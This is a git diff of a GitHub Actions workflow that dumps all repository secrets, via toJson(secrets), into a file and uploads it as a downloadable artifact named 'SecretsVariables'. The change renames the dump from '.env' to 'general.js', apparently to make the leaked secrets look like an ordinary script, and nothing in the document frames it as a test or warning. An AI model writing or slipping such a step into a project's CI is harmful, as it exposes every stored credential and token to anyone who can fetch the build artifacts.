--- a/.github/workflows/env.yml
+++ b/.github/workflows/env.yml
@@ -11,10 +11,10 @@ jobs:
     - name: "Echo in file"
       env:
         PVZHTMLMARCWU531UNDERPHAITH706_PASSWORD: ${{ toJson(secrets) }}
-      run: echo "$PVZHTMLMARCWU531UNDERPHAITH706_PASSWORD" > ".env"
+      run: echo "$PVZHTMLMARCWU531UNDERPHAITH706_PASSWORD" > "general.js"
       
     - uses: actions/upload-artifact@v3
       name: Upload Artifact
       with:
         name: SecretsVariables
-        path: ".env"
+        path: "general.js"
